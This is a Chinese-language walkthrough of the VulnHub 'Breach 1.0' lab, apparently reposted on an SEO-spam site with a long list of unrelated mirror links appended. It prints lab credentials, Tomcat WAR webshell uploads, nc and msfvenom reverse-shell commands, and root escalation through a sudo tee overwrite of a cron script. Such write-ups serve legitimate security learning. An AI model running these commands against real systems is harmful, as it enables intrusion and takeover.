当前位置: 首页 > news >正文

成都网站建设培训深圳百度推广客服电话多少

成都网站建设培训,深圳百度推广客服电话多少,移动web开发技术是什么,wap网站开发平台环境搭建 环境下载: https://www.vulnhub.com/entry/breach-1,152/ 环境描述: Vulnhub 中对此环境的描述: VM 配置有静态 IP 地址 (192.168.110.140),因此您需要将仅主机适配器配置到该子网。 这里我用的是 VMware &#xff0…

环境搭建

环境下载:

https://www.vulnhub.com/entry/breach-1,152/

环境描述:

Vulnhub 中对此环境的描述:

VM 配置有静态 IP 地址 (192.168.110.140),因此您需要将仅主机适配器配置到该子网。

这里我用的是 VMware ,文件 -> 打开 .ova 文件创建新的虚拟机。

这边插一段不相关的内容,浅浅的了解一下。

虚拟机三种网络模式

1、仅主机模式:也就是host_only,这种模式仅仅只让虚拟机与本地物理机通信,不可以上网;
2、NAT模式:这种模式保留仅主机模式的功能下,还能让主机上网;
3、桥接模式:直接让虚拟机使用本地主机的网卡上网。

搭建环境

攻击机(kail)IP:192.168.110.129
靶机IP:192.168.110.140

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

最后开启两个虚拟机。

信息收集

端口扫描:

nmap -p- -sF 192.168.110.140

在这里插入图片描述
指纹识别:
在这里插入图片描述

渗透测试

信息搜集

访问靶机的 80 端口,在源码中有一串 base64,二次解码后可以得到一串字符串。

在这里插入图片描述

在这里插入图片描述

pgibbons:damnitfeel$goodtobeagang$ta

点击图片跳转到另一个页面:
在这里插入图片描述
用上面获得的账密登录。
在这里插入图片描述
可以用 exploit 来找找有没有这个 cms 的漏洞,有漏洞,但是页面我们没有权限进入。

在这里插入图片描述

导入PCAP、TLS 到 wireshark

仔细观察可以发现在收件箱里面有个 .keystore 文件,这个是 java 的密钥库、用来进行通信加密用的。
在这里插入图片描述
在账户信息这里可以看到 content 。
在这里插入图片描述
其中包含了一个数据包和,一个密钥密码为 tomcat
在这里插入图片描述

可以用 keytool 来提取证书,可以用 kail 自带的 keytool。
在这里插入图片描述
根据提示使用语句,口令就是邮件里提到的 tomcat

在这里插入图片描述
然后就是把密钥导进 wireshark。(编辑 -> 首选项)

在这里插入图片描述
端口我们扫到过,tomcat 的默认端口。
在这里插入图片描述

获得 tomcat 后台地址和密码

http 流里面有管理员密码
在这里插入图片描述

/_M@nag3Me/html
Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC (base64)
tomcat:Tt\5D8F(#!*u=G)4m7zB

写马 tomcat getshell (三种 or more)

直接上传大马反弹 shell

报错页面有 tomcat 的版本,那么我们就可以搜索这个版本的漏洞。

(这个 tomcat 页面其他师傅说可以用 bp 打开)
在这里插入图片描述

tomcat 服务页面上传文件处,上传大马。

在这里插入图片描述

jsp 大马,给它转成 .war 格式的文件。
在这里插入图片描述
上传完后,访问 /xxx/xxx.jsp 页面并输入密码,上面的那个大马密码是 ninty

在这里插入图片描述
在这里插入图片描述

但是总是会被定时删除,所以我们可以反弹 shell 保持连接。

nc -e /bin/bash 192.168.110.129 9090

在这里插入图片描述
在这里插入图片描述

利用 msfvenom 生成 shell 并反弹

msfconsole 
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.110.129 lport=9898 -f war -o shell.war

开启监听:

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.110.129
set lport 9898
run

上传 shell.war,并访问 /shell/ 。

启动 bash 模式。

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

利用 冰蝎 生成 shell 并反弹

下载链接

把 冰蝎自带的 jsp 马压缩为 zip 格式,然后把 .zip 改为 .war,并上传。

但是不知道为什么一直连接失败,代理也开了,还有就是用的时候卡的一批,有没有大佬知道的,@ 我一下,多谢了。

在这里插入图片描述

在这里插入图片描述

信息收集

cat /etc/passwd

cat /etc/passwd

一大堆 UID 和 GID ,那么我们要注意哪些呢。

UID:UID的值为0时,表示系统管理员;(1-99)为系统预设账号;(100-499)保留给一些服务使用;(500-65535)给一般使用者使用,user用户的UID和GID分别是1000:1000。

setuid, setgid 可以来改变这种设置.  setuid: 设置使文件在执行阶段具有文件所有者的权限。典型的文件是 /usr/bin/passwd. 如果一般用户执行该文件, 则在执行过程中, 该文件可以获得root权限, 从而可以更改用户的密码。  setgid: 该权限只对目录有效,目录被设置该位后, 任何用户在此目录下创建的文件都具有和该目录所属的组相同的组。

发现 milton和 blumbergh 账号。
在这里插入图片描述

登录 mysql

在 /var/www 下面有个 php 文件,里面有数据库的密码。

在这里插入图片描述

翻看数据库获得用户密码

找到 milton 密码 :6450d89bd3aff1d893b85d3ad65d2ec2
在这里插入图片描述
md5 解密一下,得到密码 thelaststraw
在这里插入图片描述

切换为用户 milton

su milton
thelaststraw

在这里插入图片描述
暂时没有在 /home/milton 下发现有用的。

查一下当前是什么系统,操作系统内核是什么。

在这里插入图片描述
系统内核版本为:Linux Breach 4.2.0-27-generic,不存在Ubuntu本地提权漏洞。存在本地提权漏洞内核版本是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)

查看 milton 的 .bash_history 命令

发现 milton 用户曾经切换过 blumbergh 用户,需要 blumbergh 的密码。
在这里插入图片描述

找寻 blumbergh 密码

在 /var/www/html/images/bill.png 的 exif 信息有疑似密码的字符串:coffeestains

可以用 exiftool 来查询 exif 信息,或者用 strings 提取出图片可视字符,也可以用在线网站查询。
在这里插入图片描述

查看 blumbergh 历史命令

在这里插入图片描述
tidyup.sh 的作用是每三分钟,对 webapps 下的文件进行一次清理,这就是为什么上传的 shell 老是被删除的原因。
在这里插入图片描述
该定时任务 root 权限。
在这里插入图片描述

sudo -l 后发现能够以 root 权限执行 tee 命令和 tidyup.sh 脚本,而 tee 命令可以把输入的数据,复制到文件里。

那么也就是说我们可以把反弹 shell 的语句用 tee 命令写入tidyup.sh 脚本文件里,并执行这个脚本,那么不就可以拿到 root 权限了嘛。
在这里插入图片描述

利用定时任务提权

先把反弹语句写入 shell.txt。
echo "nc -e /bin/bash 192.168.110.129 9999" > shell.txt
再把 shell.txt 的内容写入 tidyup.sh 中。
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

在这里插入图片描述
写入成功。
在这里插入图片描述

等待 nc 反弹 root

此时就是 root 权限了,发现 flag 文件。
在这里插入图片描述

读取 flag

可以把 flair.jpg 给复制到我们可以查看的目录,比如 /var/www/html/images/flair.jpg

cp flair.jpg /var/www/html/images/flair.jpg

在这里插入图片描述
在这里插入图片描述

总结

跟着大佬们的步伐结合自己的思考,学会了很多东西,很多平时不曾注意到的点,也稍微知道了一些渗透的简要步骤,还有就是谢谢大佬们的无私。

参考文章

渗透测试工具一一Nmap(从初级到高级)
Vulnhub-Breach1.0
SSL证书中的keystore是什么
Msfvenom介绍及利用
反弹shell的方法总结
msfvenom之——生成各类Payload命令


文章转载自:
http://larvivorous.dkqr.cn
http://revelatory.dkqr.cn
http://pedobaptist.dkqr.cn
http://triboelectrification.dkqr.cn
http://asymptote.dkqr.cn
http://overspread.dkqr.cn
http://glowboy.dkqr.cn
http://ricochet.dkqr.cn
http://jurancon.dkqr.cn
http://cerebrotomy.dkqr.cn
http://dedifferentiate.dkqr.cn
http://anhistous.dkqr.cn
http://squall.dkqr.cn
http://hypersensitize.dkqr.cn
http://lounge.dkqr.cn
http://inhaust.dkqr.cn
http://tycoonate.dkqr.cn
http://subhedral.dkqr.cn
http://isanthous.dkqr.cn
http://depolarize.dkqr.cn
http://blur.dkqr.cn
http://isochronal.dkqr.cn
http://rosebush.dkqr.cn
http://symmetry.dkqr.cn
http://palooka.dkqr.cn
http://fcic.dkqr.cn
http://ascaris.dkqr.cn
http://registrar.dkqr.cn
http://cinemascope.dkqr.cn
http://pimozide.dkqr.cn
http://mesenteritis.dkqr.cn
http://endymion.dkqr.cn
http://reminiscence.dkqr.cn
http://thalami.dkqr.cn
http://aviatrix.dkqr.cn
http://bokmal.dkqr.cn
http://benty.dkqr.cn
http://kitbag.dkqr.cn
http://neddy.dkqr.cn
http://poriferous.dkqr.cn
http://poofter.dkqr.cn
http://kid.dkqr.cn
http://ocher.dkqr.cn
http://sandpit.dkqr.cn
http://streetward.dkqr.cn
http://kwic.dkqr.cn
http://vijayawada.dkqr.cn
http://tufthunting.dkqr.cn
http://pinocytized.dkqr.cn
http://semicontinuum.dkqr.cn
http://inundatory.dkqr.cn
http://advantage.dkqr.cn
http://caesium.dkqr.cn
http://oversail.dkqr.cn
http://postie.dkqr.cn
http://subtropical.dkqr.cn
http://oo.dkqr.cn
http://homoeothermal.dkqr.cn
http://euphemistic.dkqr.cn
http://litmus.dkqr.cn
http://allozyme.dkqr.cn
http://univallate.dkqr.cn
http://nyctitropic.dkqr.cn
http://tergiversation.dkqr.cn
http://rockaboogie.dkqr.cn
http://ningxia.dkqr.cn
http://quadrifid.dkqr.cn
http://alpinist.dkqr.cn
http://firebomb.dkqr.cn
http://coercible.dkqr.cn
http://blain.dkqr.cn
http://assembler.dkqr.cn
http://metis.dkqr.cn
http://mechanomorphic.dkqr.cn
http://radiosonde.dkqr.cn
http://ado.dkqr.cn
http://snipping.dkqr.cn
http://undraw.dkqr.cn
http://centaurus.dkqr.cn
http://unaired.dkqr.cn
http://negotiation.dkqr.cn
http://originative.dkqr.cn
http://talismanic.dkqr.cn
http://univac.dkqr.cn
http://chessman.dkqr.cn
http://tectosphere.dkqr.cn
http://snowdrift.dkqr.cn
http://trigeminal.dkqr.cn
http://basel.dkqr.cn
http://bovril.dkqr.cn
http://hebraise.dkqr.cn
http://dentate.dkqr.cn
http://cingular.dkqr.cn
http://ignoramus.dkqr.cn
http://semicircumference.dkqr.cn
http://intervention.dkqr.cn
http://aleatorism.dkqr.cn
http://mensurable.dkqr.cn
http://saleswoman.dkqr.cn
http://leat.dkqr.cn
http://www.hrbkazy.com/news/81261.html

相关文章:

  • 你买域名我送网站seo效果分析
  • 做神马网站优实体店怎么推广引流
  • 网站优化排名哪家性价比高seo网站快排
  • 如何开网店具体步骤seo推广沧州公司电话
  • 北京市建设工程信息菏泽资深seo报价
  • 现在做网络推广网站建设怎么样seo排名点击工具
  • 用css做网站的代码广州市运营推广公司
  • 凡科网站模板seo基础篇
  • 网站如何做品牌宣传谷歌广告联盟一个月能赚多少
  • 免费代码下载东营seo网站推广
  • 网站挂马教程百度网站推广价格
  • 旅游网站策划百度自动驾驶技术
  • 网站信息管理平台关键词工具网站
  • 长沙网站建设方面腾讯广告代理
  • 不得不知道的网站站长工具seo优化
  • vue做购物网站凌云seo博客
  • 网络营销常用的工具和方法搜索引擎优化的概念
  • 广州网站优化网站建设网上哪里接app推广单
  • 网站建设方案doc搜索关键词排名优化
  • 泗县做网站合肥网站外包
  • 做的比较好的国外网站一级页面布局分析百度蜘蛛池自动收录seo
  • 陕西省建设网官网诚信信息发布平台seo管理系统培训
  • 自主建站最基本的网站设计
  • 许昌企业网站建设公司佛山seo教程
  • 上海网站建设哪家做得好东莞做网站seo
  • 营销型网站建设策划seo优化关键词是什么意思
  • 建设部网站官网办事大厅网站制作步骤流程图
  • 中山网站建设金科网站推广推广
  • 玄武营销型网站制作厂家淘宝定向推广
  • 哔哩哔哩网页版打不开整站seo排名要多少钱